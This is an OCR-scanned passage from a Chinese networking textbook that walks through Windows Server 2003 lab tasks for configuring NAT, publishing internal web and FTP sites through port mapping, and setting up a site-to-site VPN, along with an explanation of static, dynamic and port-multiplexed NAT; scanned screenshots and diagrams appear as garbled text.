人 / Mask: 255.255.255.0 ，Mask:， 255.255.255.0 
\\Gateway: 192.168.1.1 ,/ 1 
、\ 7 
< 
a x 
主机 名 称 操作 系统 IP 地 址 域名 担任 角色 
主机 1 | Windows XP 192.168.1.10 


主机 2 | Windows Server 2003 | 192.168.1.20 www.lib.gdcp.cn 书馆 Web 服 务 器 


本 192.168.1.1 学 校 Web 服 务 器 、DNS 服 
主机 3 “| Windows Server 2003 | 202.116.64.100 | www8dcp.cn 务 器 、NAT 服 务 器 


主机 4 Windows Server 2003 | 202.116.64.200 | www.baidu.com Baidu Server 


图 7-56 工作 任务 十 二 的 工作 环境 拓扑 图 
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NAT 网 络 地 址 转换 是 将 内 部 私有 IP 地 址 转换 为 外 部 公共 IP 地 址 的 转换 技术 。 局 域 
网 主机 通过 共享 外 部 IP 接 入 Internet。 使 用 NAT 不 仅 可 以 解决 IP 地 址 不 足 ,还 能 隐藏 保 
护 内 网 主机 ,和 避免 来 自 外 部 网 络 攻击 。 

工作 过 程 

1. 配置 NAT 服务 

01) 在 主机 2、 主机 3 和 主机 4 上 配置 相应 Web 站 点 。 

(2) 更 改 主机 3 网 卡 接口 名 称 。 打 开 * 控 制 面板 "窗口 ,再 单 击 * 网 络 连接 "链接 ,在 打开 
的 窗口 中 选中 相应 网 卡 分 别 重 命名 为 3- 交 换 机 网 卡 " 和 *3-4 网 卡 ”, 如 图 7-57 所 示 。 


EEC TREE TREE 
加 恨 - 目 -站 |P 己 XH 天 | 记 方 X 四 | 四- 
眉目 后 


IAN 或 高 速 Internet 


图 7-57 更 改 网 卡 接口 名 称 


(3) 在 主机 3 上 配置 DNS 服务 ,其 中 “192. 168. 1. 20” 域 名 是 “www. lib. gdcp. cn”， 
“202. 116. 64. 100” 域 名 是 “www. gdcp. cn”,“202. 116. 64. 200” 域 名 是 “www. baidu. com”。 
(4) 开启 主机 3 NAT 服务 ,选择 “开始 ”一 “管理 工具 ”>“ 路 由 和 远程 访问 "命令 并 选中 


服务 器 , 右 击 “主机 3” 选 项 ,在 弹出 的 快捷 菜单 中 选择 “配置 并 启用 路 由 和 远程 访问 "命令 ， 
如 图 7-58 所 示 。 


路 由 和 远程 访问 
文件 四 名作 查看 WD 帮助 0 
朱 省 | 向 国 |X 具 日 | 名 转 


=|Djx| 


豆 中 条 
| 服务 器 状态 


务 器 的 配置 
下 ER ， 在 “操作 ” 竣 单 上 单 击 “ 配 置 并 启用 路 由 


卫 程 访问 ， 部 署 方案 ， 以 及 疑难 解答 的 更 多 信息 ， 


图 7-58 启用 路 由 和 远程 访问 


(5) 单 击 “ 下 一 步 ” 按 钮 ,然后 选择 网络 地 址 转换 NAT” 选 项 ,在 公共 接口 中 选择 “3-4” 
网 卡 , 如 图 7-59 所 示 。 
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路 由 和 运程 访问 服务 器 安装 凋 导 
JEAT Internet 


连接 > 
人 Da] 
口 未 连接 到 Internet。 一 


他 使用 此 公共 接口 连接 到 Internet QD 
3 


A 通过 轩 防火 来 在 于 和 的 进行 保护 到) 
基本 防火 墙 防止 未 授权 的 用 户 通过 Internet 访问 此 服务 器 


有 关 网 络 接口 的 更 多 信息 ， 请 参阅 路 由 和 远程 访问 帮助 
| 
图 7-59 选择 公共 接口 网 卡 
(6) 单 击 “下 一 步 ?按钮 , 稍 后 设置 名 称 和 地 址 服务 ,根据 向 导 完 成 NAT 服务 配置 。 
2. 实验 测试 
(1) 当主 机 1 和 主机 4 配置 网 关 后 ,主机 1 可 以 通过 ping 命令 连通 主机 2 主机 3 和 主机 4。 
(2) 主机 4 不 能 连通 内 网 主机 1 和 主机 22。 
(3) 当主 机 1 配置 DNS 服务 IP 后 ,可 以 通过 相应 域名 访问 主机 2、 主机 3 和 主机 4 
Web 站 点 。 
(4) 当主 机 1 访问 外 网 主机 4*Baidu” 站 点 后 ,在 主机 3 上 选择 “NAT/ 基 本 防火 墙 ? 选 


项 卡 ,再 选中 “3-4” 网 卡 然后 单 击 “ 显 示 映 射 "按钮 ,在 弹出 的 对 话 框 中 可 以 看 到 具体 转换 关 
系 , 如 图 7-60 所 示 。 


方向 | 专用 地 址 | | 公用 地 址 | 公用 请 
站 2,1665.1.10 1 120 202. 116.64. 100 61, 439 
出 站 。 192.168.1.10 1,121 202. 116.64. 100 61,440 


图 7-60 查看 NAT 转换 关系 


任务 总 结 逢 


NAT 并 不 是 禁止 内 外 网 络 之 间 的 连接 ,而 是 允许 内 网 主机 连接 外 网 ,禁止 外 网 主机 主 
动 连接 内 网 。 因 为 内 网 主机 与 外 网 做 TCP 连接 后 生成 转换 关系 ,NAT 服务 器 根据 转换 关 
系 将 外 网 数据 返回 给 内 网 主机 , 当 TCP 连接 断 开 后 转换 关系 随 之 消失 。 当 外 网 主机 主动 连 


@ 在 内 网 连接 外 网 时 ,因为 所 有 内 网 了 P 通 过 NAT 转换 为 公共 IP*202. 116. 64. 100" 接 人 外 网 。 主 机 1 连接 主机 
4, 而 在 主机 4 看 来 是 主机 3 IP“202. 116. 64. 100" 连 接 自己 。 在 外 网 连接 内 网 时 ,由 于 缺少 转换 关系 ,NAT 无 法 将 主机 4 
数据 传 给 相应 内 网 主机 ,因此 主机 4 无 法 连通 内 网 主机 。 
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接 内 网 时 ,由 于 NAT 服务 器 不 存在 转换 关系 ,外 网 数据 无 法 传 给 内 网 主机 ,因此 外 网 主机 
无 法 访问 内 网 IP。 通 过 地 址 转换 ,NAT 可 以 隐藏 内 部 网 络 拓扑 ,从 而 避免 内 网 主机 遭受 来 
自 外 网 攻击 和 扫描 。 


工作 任务 十 三 通过 NAT 发布 内 网 站 点 


工作 目的 

通过 NAT 对 外 发 布 内 网 站 点 。 

工作 任务 

小 张 是 学 校 网 管 中 心 人 员 , 需 配 置 学 校 NAT 服务 器 以 实现 以 下 要 求 。 

(1) 主机 1 配置 学 校 Web 站 点 ,主机 2 配置 学 校 FTP 站 点 。 

(2) 主机 3 配置 NAT 服务 ,让 主机 1 和 主机 2 通过 公共 IP“202. 116. 64. 100” 接 入 外 网 。 

(3) 主机 3 通过 NAT 服务 器 公共 IP*202. 116. 64. 100” 对 外 发 布 主 机 1 和 主机 2 站 点 。 

其 他 园区 网 的 设置 如 下 。 

(1) 主机 4 配置 DHCP 服务 ,让 主机 5 自动 获取 IP 信息 。 

(2) 主机 4 配置 NAT 服务 ,让 主机 5 通过 公共 IP*202. 116. 64. 200” 接 入 外 网 。 

(3) 主机 4 配置 DNS 服务 ,让 主机 5 通过 域名 “www. gdcp. cn” 访 问 主 机 1, 通 过 域名 
“ftp. gdcp. cn” 访 问 主机 2。 

工作 环境 和 工具 

主机 3 和 主机 4 内 置 两 个 网 卡 ,其 中 主机 3*3-4” 网 卡 和 主机 4*4-3” 网 卡通 过 交叉 线 直 
接连 接 , 模 拟 广域网 拓扑 ,具体 工作 环境 拓扑 图 如 图 7-61 所 示 , 工 具 和 录像 可 在 http:// 
www,. gdcp. cn/jpkc/lf 中 下 载 。 

NAT 可 以 将 内 部 私有 IP 转换 为 外 部 公共 IP, 还 可 以 通过 不 同 端口 号 对 外 发 布 内 网 站 
点 。 由 于 内 网 服务 器 与 外 网 连接 需要 NAT 映射 转换 , 故 NAT 的 中 介 作 用 可 以 避免 内 网 服 
务 器 遭受 来 自 外 网 的 攻击 和 入 侵 。 

工作 过 程 

1. 校园 网 配置 

(1) 在 主机 1 和 主机 2 上 分 别 发 布 学 校 Web 站 点 和 FTP 站 点 。 

(2) 更 改 主机 3 网 卡 接口 名 称 ,其 中 专用 接口 是 3- 交换 机 ”,IP 为 “192. 168. 1.1”0; 公 
共 接 口 是 “3-4”,IP 为 “202. 116. 64. 100”。 

(3) 在 主机 3 上 启用 NAT 服务 ,让 主机 1 和 主机 2 可 以 通过 公共 IP*202. 116. 64. 100” 
接 入 外 网 。 

(4) 禁用 “3-4” 接 口 防火 墙 。 选 择 “ 路 由 和 远程 访问 "选项 和 “NAT/ 基 本 防火 墙 ”选项 ， 
然后 右 击 “3-4” 接 口 并 选择 “属性 ”命令 ,在 弹出 的 对 话 框 中 选择 *"NAT/ 基 本 防火 墙 * 选 项 
卡 , 不 勾 选 “在 此 接口 启用 基本 防火 墙 " 复 选 框 ,否则 “3-4” 接 口 会 丢弃 外 网 传人 的 所 有 数据 包 ， 
导致 主机 4 和 主机 5 无 法 连通 主机 3, 更 无 法 访问 内 网 主机 1 和 主机 2 站 点 ,如 图 7-62 所 示 。 


@ 专用 接口 网 卡 要 根据 内 部 网 络 规模 选择 合适 IP 地 址 ,对 于 小 规模 网 络 一 般 选用 C 类 专用 IP, 如 192. 168. 1. 1， 
此 时 局 域 网 内 所 有 主机 都 要 处 于 192. 168. 1.0 网 段 ,并 以 专用 接口 IP 作为 网 关 ; 对 于 中 规模 网 络 要 选用 B 类 专用 全, 如 
172.16.1.1; 对 于 大 规模 网 络 选用 A 类 专用 IP, 如 10.10.10.1。 
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i ~ 2 
i 学 校 Web i 4 
”Web 服务 器 > 
3 域名 : www.gdcp.cn `、 Ar 服务 器 
pd ee pA DHCP 服 务 器 
/ NAT 服 务 器 \ a /DNS 服务 器 
1 IP: 192.168.1.10 Vnetl 外 网 2 VneB 
1 Mask: 255.255.255.0 专用 接口 公共 接口 专用 接口 十 
1 Gateway: 192.168.1.1 交换 机 ee 
1 


上 
了 
IP: 192.168， 


1 1 
3- 交 换 机 网 卡 13-4 网 卡 


1 
4-3 网 卡 ! 4- 交 换 机 网 卡 


1.11IP:。 202.110.64.100 IP: 202.116.64.200! IP: 172.16.1.1 


t = Mask: 255.255.255. 5255.255.0 Mask: 255.255.255.0, Mask: 255.255.255.0 jp 自动 获取 / 
\、 学 校 FTP 服 务 器 Re 1 
、 域名 : ftp.gdcp.cn Ny 

、 IP: 192.168.1.20 \ 
、\、、 Mask: 255.255.255.0 校园 网 \、 其 他 园区 网 六 
~ Gateway: 192.168.1.1 Ew 、\ 5 
SR SS ey 
主机 名 称 操作 系统 IP 地 址 域名 担任 角色 
主机 1 Windows Server 2003 | 192.168.1.10 Www.gdcp.cn 学 校 Web 服 务 器 
主机 2 | Windows Server 2003 | 192.168.1.20 ftp.gdcp.cn 学 校 Ftp 服 务 器 
主机 3 | Windows Server 2003 人 ee 00 学 校 NAT 服 务 器 
172.16.1.1 同 区 网 DHCP 服 务 器 
主机 4 | Windows Server 2003 EN 人 
202.116.64.200 园区 网 NAT 服 务 器 
主机 5 | Windows XP IP 自 动 获取 
图 7-61 工作 任务 十 三 的 工作 环境 拓扑 图 
E33| 
EE 
接口 类 型 : 
个 专用 接口 连接 有 | 专用 网 络 下) 
医用 琅 口 连接 Internet QD) 


你 在 此 接口 上 启用 RAT 到 ) 
Te le 


厂 在 此 接口 上 启用 基本 防火 墙 四) 
其 本 防火 墙 只 有 在 网 络 要 求 的 时 候 才 从 Internet 接收 数据 


个 妈 基 本 防火 墙 @) 
天 老 数 据 包 策 选 器 
"TR tt to 亚 地 址 或 协 


入 站 入 先 器 在) | 出 站 第 选 器 @) 


me | es | 


图 7-62 禁用 “3-4” 接 口 防火 墙 
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(5) 主机 3 通过 NAT 服务 器 “3-4” 接 口 发 布 主机 1 Web 站 点 ; 选择 “NAT/ 基 本 防火 
墙 ” 选 项 卡 , 右 击 “3-4” 接 口 ,在 弹出 的 快捷 菜单 中 选择 选择 “属性 ”命令 ,在 弹出 的 对 话 框 中 
选择 “服务 和 端口 ”选项 卡 , 然 后 选中 “Web 服务 器 (HTTP)” 选 项 ,如 图 7-63 所 示 。 
| 
Im/ 要 本 防 炎 培 | 地 二 | 服务 和 | | 
潍 吉 外 镶 区 汉 internet 用 户 访 问 的 服务 。 这 将 在 


服务 G) 


口 YPN 网 关 02TF/IFSec - 运行 于 此 服务 器 上 ) 
) 


添加 0D) ik 期 队 到 ) | 


图 7-63 人 允许 传人 Web 服务 


在 接着 打开 的 "编辑 服务 "对 话 框 中 填写 数据 包 传 出 地 址 "192. 168. 1. 10”, 传 入 端口 和 
传 出 端口 都 是 80( 不 可 更 改 ), 即 “3-4” 接 口 如 果 收 到 外 网 传人 端口 为 80 的 数据 包 , 则 将 其 传 
出 至 192. 168. 1. 10 主机 1, 并 保持 传 出 端口 80 不 变 ,如 图 7-64 所 示 。 


eb OTP) 
公用 地 址 

他 在 此 接口 D) 

个 在 此 地 处 池 项 E 
[协议 中 

FTCEGJ © EW | 

传 入 端口 GD) 反 
专用 地 址 外 )- 192.168. 1 . 10 
传 出 端口 @) 民 


Cm | ws | 


图 7-64 指定 Web 服务 传 出 地 址 


(6) 用 同样 方法 在 主机 3 上 对 外 发 布 主机 2 的 FTP 站 点 。 选 择 “NAT/ 基 本 防火 墙 ” 选 
项 卡 , 右 击 "3-4” 接 口 ,在 弹出 的 快捷 菜单 中 选择 选择 “属性 ”命令 ,在 弹出 的 对 话 框 中 选择 
“服务 和 端口 ?选项 卡 ,然后 选中 *FTP 服务 器 "选项 ,在 接 下 来 弹出 的 “编辑 服务 ”对 话 框 中 
填写 数据 包 传 出 地 址 “192. 168. 1. 20”, 如 图 7-65 所 示 。 
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Hx 
生生 手 和 下 中 寺 相持 守 博 呈 竺 完 线 丰 池 现时 拘 光 吉 拉 天 的 
服务 描述 四 ): 
王公 用 地 址 

人 在 此 接口 四 
合 在 此 地 十 池 项 好 [ 
协议 中 
TPO) © wr 
传 入 端口 中); EE 
专用 地 址 邓 ) 192.168. 1 . 20 
传 出 端口 O) : F 


图 7-65 指定 FTP 服务 传 出 地 址 


2. 园区 网 配置 

(1) 在 主机 4 上 配置 DHCP 服务 ,让 主机 5 自动 获得 “172. 16. 0.0” 网 段 IP 地 址 ,网 关 
和 DNS 服务 器 地 址 都 是 *172. 16. 1. 1”。 

(2) 在 主机 4 上 配置 DNS 服务 ,其 中 “192. 168. 1. 10” 域 名 是 “www. gdcp. cn”,“192. 
168. 1. 20” 域 名 是 “ftp. gdcp. cn”。 

3. 实验 测试 

(1) 当主 机 5 自动 获取 IP 地 址 后 ,通过 ping 命令 只 能 连通 主机 3 的 “3-4” 接 口 网 卡 ,其 
IP 是 “202. 116. 64. 100”。 

(2) 由 于 主机 3 NAT 服务 器 缺少 映射 关系 ,主机 5 不 能 连通 主机 1 和 主机 2。 

(3) 主机 5 浏览 器 可 以 通过 域名 “http://www. gdcp. cn” 访 问 主机 1 的 Web 站 点 ,并 
通过 域名 “ftp: //gdcp. cn” 访 问 主 机 2 的 FTP 站 点 。 


| 任 甸 总 结 各 


NAT 可 以 通过 不 同 端 口号 对 外 发 布 多 个 内 网 站 点 。 在 本 工作 任务 中 ,假如 主机 3 本 身 
提供 Web 服务 (通过 IP“202. 116. 64. 100” 和 80 端口 发 布 ) ,而 "3-4” 网 卡 接口 又 启用 传人 
80 端口 数据 包 ( 指 定 传 出 地 址 为 “192. 168. 1. 10”) ,那么 主机 5 通过 浏览 器 “http: //202. 
116. 64.100” 访 问 的 站 点 仍 是 主机 1 的 Web 站 点 ,而 不 是 主机 3 的 站 点 。 


为 解决 全 球 IP 地 址 不 足 , 在 A、B、C 这 3 类 地 址 段 划 出 部 分 区 域 作为 专用 地 址 ,也 称 为 
私 用 地 址 (Paivate Address) 。 专 用 地 址 是 任何 内 部 机 构 和 私有 网 络 都 可 以 使 用 的 IP 地址， 
并 可 以 重复 分 配 , 用 于 标识 一 个 局 域 网 内 部 不 同 主机 。 专 用 地 址 不 能 标识 因特网 中 的 计算 
机 ,也 不 能 用 于 Internet 通信 , 当 接 入 外 网 时 必须 转换 为 公共 IJIP 地 址 (Piblic Address)。3 
类 专用 地 址 段 如 下 。 
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(1) A 类 地 址 中 的 10. 0. 0.0 一 10.255. 255. 255。 

(2) 了 B 类 地 址 中 的 172. 16. 0. 0 一 172. 31. 255. 255。 

(3) C 类 地 址 中 的 192. 168. 0. 0 一 192. 168. 255. 255。 

NAT(Network Address Translation) 网 络 地 址 转换 用 于 将 内 部 网 络 私有 IP 地 址 转换 
为 Internet 外 部 网 络 地址 ,局域网 所 有 主机 通过 共享 公共 IP 方式 接 人 外 网 。 使 用 NAT 可 
以 节约 有 限 的 公共 也, 降低 Internet 接 和 人 成 本 ,还 可 以 隐藏 内 部 网 络 拓扑 ,避免 内 网 主机 遭 
受 来 自 外 网 的 探测 和 攻击 。 

NAT 实现 方式 : NAT 通过 修改 IP 报头 ,更 换 源 地 址 、 目 的 地 址 和 端口 号 实现 网 络 地 
址 转换 ,这 可 以 由 硬件 和 软件 完成 ,如 路 由 器 、Linux 及 Windows 操作 系统 。 根 据 转换 方式 
NAT 可 以 分 为 静态 NAT ,动态 NAT 和 端口 复 用 NAT。 

1. 静态 NAT 

静态 NAT 是 按照 一 对 一 方式 将 内 部 专用 IP 静态 转换 为 外 部 公共 IP, 用 于 外 网 主机 访 
间 内 网 服务 器 和 设备 。 在 静态 转换 中 ,如 果 需 要 发 布 n 个 服务 器 则 需要 个 公共 IP, 如 
图 7-66 所 示 。NAT 通过 3 个 公共 IP 对 外 发 布 内 网 服务 器 ,外 网 客户 可 以 通过 地 址 
“Http://170.168. 2.2” 访 问 主机 A Web 站 点 ,通过 “ftp://170. 168. 2. 3” 访 问 主机 B FTP 
站 点 ,通过 “mail://170.168. 2. 4” 访 问 主机 C Mail 站 点 ,这 种 转换 是 一 对 一 的 , 且 是 静态 
不 变 的 ,否则 只 会 给 外 网 客户 访问 带 来 不 便 。 静 态 NAT 转换 不 能 节约 IP 地 址 ,并 且 由 于 
转换 关系 保持 不 变 , 外 网 主机 可 以 利用 转换 关系 扫描 内 网 服务 器 ,NAT 起 不 到 安全 隔离 与 
保护 作用 。 但 是 ,其 好 处 是 服务 器 不 会 直接 暴露 在 因特网 中 ,通过 配置 NAT 访问 策略 在 一 
定 程度 上 可 以 弥补 内 网 服务 器 的 漏洞 0, 从 而 减少 外 网 攻击 。 


Inside 


170.168.2.2yAoe 


bb; Client 
Host C Mail Server 63.40.7.3 


Host B Ftp Server 


NAT table 
人 Inside Local Inside Global | 
IP Address IP Address 
10.1.1.3 170.168.2.4 
10.1.1.2 170.168.2.3 


1 
1 
10.1.1.1 1 
!Host A Web Server _ | 


10.1.1.1 170.168.2.2 


图 7-66 静态 NAT 


@ 例如 ,Windows 2003 系统 默认 打开 139 端口 ,内 网 服务 器 若 不 提供 该 服务 但 仍然 开放 139 端口 则 会 存在 安全 隐 
患 ,这 时 可 以 配置 NAT 访问 策略 限制 139 端口 的 传人 ,从 而 减 少 内 网 服务 器 遭受 外 网 人 侵 的 几率 。 
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2. 动态 NAT 

动态 NAT 是 指 将 内 部 专用 IP 转换 为 一 个 临时 公共 IP, 每 次 转换 IP 地 址 是 不 确定 的 ， 
用 于 局 域 网 内 部 主机 通过 拨号 获取 公共 IP 接 入 Internet , 当 断 开 连 接 时 公共 IP 会 重新 释放 
回收 。 动 态 NAT 可 以 使 用 多 个 外 部 公共 地 址 , 当 ISP 提供 的 公共 IP 略 少 于 局 域 网 主机 数 
量 时 ,可 以 采用 动态 转换 ,这 可 以 在 一 定 程度 上 节约 IP 地 址 。 在 图 7-67 中 ,局 域 网 存在 254 
个 主机 ,而 申请 的 公共 IP 只 有 100 个 ,其 中 “170.168.2.1” 用 于 标识 路 由 器 外 部 IP ,剩余 99 
个 IP 作为 公共 地 址 池 。 在 任意 时 刻 局 域 网 主机 都 不 可 能 全 部 接 入 Internet, 此 时 可 以 采用 
动态 分 配 ,只 有 和 需要 接 入 外 网 的 主机 才 被 临时 分 配 一 个 合法 公共 IP。 


Inside 


[17015822Pe 


63.40.7.3 


NAT Pool 
Inside Global 】 


JP Address 


1 Inside Local 
| IP Address 
1 


10.1.1.1 
本 生生 区 于 让 10.1.1.254 170.168.2.100 


10,1:12t 170.168.2.2 


图 7-67 动态 NAT 


3. 端口 复 用 NAT 

端口 复 用 NAT 也 被 称 为 PAT 或 NAPT, 通 过 不 同 端口 号 将 内 部 网 络 IP 转换 为 外 部 
公共 IP, 可 以 有 效 解决 IP 地 址 不 足 问题 。NAPT 将 局 域 网 专用 IP 和 端口 号 映射 为 公共 IP 
和 端口 号 ,这 种 转换 是 动态 生成 的 ,一 旦 连接 断 开 转换 关系 随 之 消失 ,因此 内 网 主机 通过 
NAPT 转换 可 以 访问 外 网 ,而 外 网 用 户 由 于 缺少 转换 关系 故 不 能 主动 访问 内 网 主机 0。 此 
时 ,NAT 服务 器 充当 中 介 作 用 ,通过 限制 内 外 网 络 主机 的 直接 连接 ,从 而 避免 来 自 外 网 的 
攻击 和 入 侵 。 在 图 7-68 中 ,主机 A 需要 访问 外 网 Web 站 点 ,步骤 如 下 。 

(1) 主机 A 通过 浏览 器 访问 外 网 Web 站 点 , 原 地 址 和 端口 是 “10. 1.1.1: 1024”@, 目 的 
地 址 和 端口 是 “63. 40. 7.3:80”, 通 过 指定 默认 网 关 发 向 NAT 服务 器 。 

(2) NAT 服务 器 在 接收 到 后 ,将 私有 地 址 "10. 1. 1. 1” 替 换 为 全 局 公共 地 址 “170. 168. 2. 2”， 


@ 只 有 内 网 主机 访问 外 网 主机 存在 转换 关系 ,外 网 主机 才能 将 数据 返回 至 内 网 主机 。 
@ 1024 源 端口 号 是 随机 生成 的 ,如 打开 一 个 浏览 器 源 端口 是 1024, 再 打开 一 个 浏览 器 源 端 口 为 1025, 以 此 类 推 ， 
不 同 浏览 器 通过 不 同 端口 号 标识 。 
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Inside 


Web Server 
63.40.7.3 


NATtable 


Protocol | Inside Local IP | Inside Global IP | Outside Global 
nl Hol Address: Port | Address: Port |IP Address: Port 
1 
10.1.1.1 1| TcCP 10.1.1.1:1024 | 170.168.2.2:1492 | 63.40.7.3:80 
Host AClient __ J EF h p 


图 7-68 NAPT 


并 使 用 端口 号 1492@ 替换 1024, 此 时 源 地 址 和 端口 变 为 “170. 168. 2. 2: 1492”, 目 的 地 址 
和 端口 保持 不 变 , 仍 是 “63. 40.7.3;80”。NAT 服务 器 转换 后 将 之 发 向 外 网 Web 服 
务 器 。 

(3) Web 服务 器 在 收 到 访问 请 求 后 做 出 响应 , 源 地 址 和 端口 是 “63. 40.7.3:80”, 目 的 地 
址 和 端口 是 “170. 168. 2.2: 1492”, 返 回 NAT 服务 器 。 

(4) NAT 服务 器 收 到 响应 ,根据 1492 端口 号 在 映射 表 中 查找 相应 转换 记录 ,替换 目的 
地 址 和 端口 号 为 "10. 1. 1. 1:1024”, 源 地 址 和 端口 仍 是 “63. 40. 7.3:80”, 并 发 向 主机 A。 

(5) 主机 A 收 到 后 根据 目的 端口 号 *1024” 返 回 相 应 浏览 器 ,完成 数据 传输 后 断 开 TCP 
连接 ,NAT 服务 器 清除 该 转换 记录 。 

在 NAPT 中 ,内 网 主机 可 以 访问 外 网 ,但 是 外 网 不 能 主动 访问 内 网 。NAT 的 3 种 实现 
方式 和 区 别 见 表 7-2。 


表 7-2 NAT 的 3 种 实现 方式 与 区 别 


特点 F 区 
前 ，- 统 oe 内 网 能 否 | 外 网 能 否 | 能 否 吉 免 | 能 否 节约 
分 类 访问 外 网 | 访问 内 网 | 外 网 人 侵 | IP 地 址 
用 于 对 外 发 布 内 网 | 一 个 专用 IP 对 应 一 
态 NAT b b 
和 服务 器 和 设备 个 公共 IP | 
用 于 局 域 网 主机 接 | 一 个 专用 IP 随机 转 可 以 节约 
动态 NAT| jenet i 可 以 | 可 以 | 不 能 | Ip 
用 于 局 域 网 主机 共 | 专用 IP 十 端口 号 映 二 
NAPT | 享 一 个 公共 耳 接 | 射 为 公共 耳 十 端 | 可 以 | 不 可 以 | 可 以 人 本 
入 Internet 口号 


@ 替换 端口 号 1492 是 随机 生成 的 ,如 第 一 个 转换 记录 采用 1492, 则 下 一 个 待 转 换 记 录用 1493, 以 此 类 推 ,不 同 
转换 记录 通过 不 同 端 口号 标识 。 
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7.6 ”VPN 服务 


工作 任务 十 四 配置 专线 VPN 服务 


工作 目的 

安装 和 配置 专线 VPN 服务 。 

工作 任务 

小 张 是 企业 网 络 工程 部 技术 人 员 , 因 业务 需求 在 上 海 和 北京 建立 子 公司 ,并 实现 以 下 
要 求 。 

(1) 主机 2 和 主机 3 配置 专线 VPN 服务 器 连接 上 海 和 北京 子 公 司 , 组 成 逻辑 上 局 
域 网 。 

(2) 主机 1 可 以 连通 主机 4, 并 能 访问 主机 4 共享 文件 。 

工作 环境 和 工具 
主机 3 内 置 两 个 网 卡 ,其 中 “2-1” 网 卡通 过 交叉 线 与 主机 1 连接 ,“2-3” 网 卡通 过 交叉 线 
与 主机 33-2” 网 卡 连接 ,模拟 广域网 拓扑 ; 主机 3 内 置 两 个 网 卡 , 其 中 “3-4” 网 卡通 过 交叉 
线 与 主机 4 连接 ,“3-2” 网 卡通 过 交叉 线 与 主机 2 的 “2-3” 网 卡 连接 ,具体 工作 环境 拓扑 图 如 
图 7-69 所 示 ,工具 和 录像 可 在 http://www. gdcp. cn/jpkc/lf 中 下 载 。 
虚拟 专用 网 络 VPN 是 利用 Internet 传输 私有 网 络 数据 , 称 之 为 虚拟 是 因为 远程 两 局 域 
网 间 的 连接 不 存在 传统 专用 网 络 所 需 的 端 到 端 物理 链 路 ,而 是 通过 租用 Internet 将 远程 局 
域 网 在 逻辑 上 连接 在 一 起 ,数据 经 过 加 密 后 在 公共 网 络 中 按照 * 先 进 先 出 "原则 抵达 目的 网 
络 ,因此 VPN 连接 被 形象 地 称 为 隧道 。 

工作 过 程 

1. 配置 主机 2 VPN 服务 

(1) 更 改 主机 2 网 卡 接口 名 称 , 其 中 专用 接口 是 “3-1 ”网卡 ,IP 为 “192. 168. 1. 1”; 公共 
接口 是 “2-3” 网 卡 ,IP 为 “202. 202. 1. 1”。 

(2) 启用 VPN 服务。 选择“ 开始” 一 “管理 工具 ”>“ 路 由 和 远程 访问 ”命令 ,然后 选择 
“配置 并 启用 路 由 和 远程 访问 "选项 ,进入 “路 由 和 远程 访问 服务 器 安装 向 导 ” 界 面 , 青 选中 
“两 个 专用 网 络 之 间 的 安全 连接 " 单 选 按 钮 ,如 图 7-70 所 示 , 单 击 “ 下 一 步 ” 按 钮 ,不 使 用 请 求 
拨号 连接 访问 远程 网 络 , 并 完成 安装 向 导 。 

(3) 配置 请 求 拨号 接口 。 在 “网 络 接 口 * 列 表 框 中 右 击 并 选择 “新 建 请 求 拨号 接口 " 命 
令 , 如 图 7-71 所 示 , 新 建 接口 名 称 为 “beijing”, 连 接 类 型 为 “使 用 虚拟 专用 网 络 连接 
(VPN)”,VPN 数据 封装 类 型 采用 “点 对 点 隧道 协议 ”, 连 接 目 标 地 址 是 主机 3 的 “3-2” 网 卡 
接口 IP*202. 202. 1. 2”, 并 选中 “添加 用 户 账户 使 远程 路 由 器 可 以 拨 入 ”选项 。 

(4) 添加 目标 专用 网 络 静态 路 由 。 单 击 “ 下 一 步 ? 按 钮 为 beijing 接口 添加 抵达 目标 专 
用 网 络 路 由 ,目标 IP 是 “172. 16. 1. 0”, 子 网 掩 码 是 “255. 255. 255. 0”, 跃 点 数 表示 所 经 过 的 
中 间 路 由 转发 跳 数 ,默认 值 是 1, 如 图 7-72 所 示 。 
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2 a pe 0 
人 凭据 : shanghai % 
这 按 入 作 所 :beijing - 扫 入 \、 > 
六 0 ~ 2 接口 名 称 : shanghai i 
接口 名 称 Shanghal / 目标 地 址 : 202.202.1.1 \ 
/ 二 人 人 拨 出 目标 网 络 :192.168.1.0.255.255.255.0 
/查找 共享 是 标 网 一 一 一 拨 出 赁 据 : beijing 设置 共享 \ 
拨 出 凭据 : shanghai . 密码 :abc 
1 密码 : 123 上 
1 1 1 ' 
Internet 
tt Q is 
1 ~、 | 3 ! 
主机 4: Client 
i 主机 2，VPN 服 务 器 1 ， 主机 3: VPN 服 务 器 Ip: 17216.110 | 
: \ Mask: 255.255.255.0 
Mask: 255.255.255.0 2-1 网 卡 123 网 卡 \ 3.2 网 卡 13.4 网 卡 las 1 
\Gateway: 192.168.1.1 1p，192.168.L11IP: 20 / 3211ps 1724611 Gateways 17216.1.1 / 
\ Mask: 255.255.255.0 | Mask: 0 Mask: 255.255.255.0 / 
/ 
吕 / 
* 
WA 
LS 上 海 北京 / 
~ i 
a Sy 2 


主机 名 称 操作 系统 IP 地 址 拨 出 凭据 拨 入 凭据 
主机 1 Windows XP 192.168.1.10 
192.168.1.1 : Shanghai 长 号 :Beijin 
主机 2 |Windows Server2003| ”202 20211 123 kg 
要 1 172.16.1.1 3: Beijing 3 : Shanghai 
主机 3 Windows Server 2003 202 202.1.2 ,be 123 
EM4 |Windows XP 172.16.1.10 


图 7-69 工作 任务 十 四 的 工作 环境 拓扑 图 


路 由 和 远程 访问 服务 器 安装 向 导 


您 可 以 启用 下 列 服 务 的 任意 组 合 ,或 者 您 可 以 自 定义 此 服务 器 。 


个 远程 访问 战 号 或 YPN) 他) 
人 Internet 和 连 
个 网 络 地 址 转换 QAT) 到 ) 
区 许 内 部 客户 端 使 用 一 个 公共 IF 地 址 连接 到 | Internet。 


个 虚拟 考 用 网 络 0 访问 和 MAT GD 


Internet 连接 到 此 服务 器 ,本 地 客户 端 使 用 一 个 单一 的 
Interneto 


图 7-70 选择 VPN 远程 连接 
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文件 四 “操作 由， 查看 Wj 天助 如 
守 外 | 生 | 园 | 问 胞 | 岛国 


由 - 占 远程 访问 记录 


图 7-71 新 建 请 求 拨号 接口 


请 求 护 号 接口 向 导 | 


远程 网 络 的 散 态 路 由 
静态 路 由 是 手工 定义 的 、 两 网 络 间 的 常 驻 路 由 。 


下 悠 必须 格 一 个 静 老 路 由 添加 到 网 络 中 。 请 指定 此 网 络 用 来 通讯 
静态 路 由 G) 


跃 点 数 
1 


172.16.1.0 255. 255. 255.0 


册 除 芭 ) 


《上 一 步 四 | 下 一 步 吧 a| 取消 


图 7-72 添加 静态 路 由 


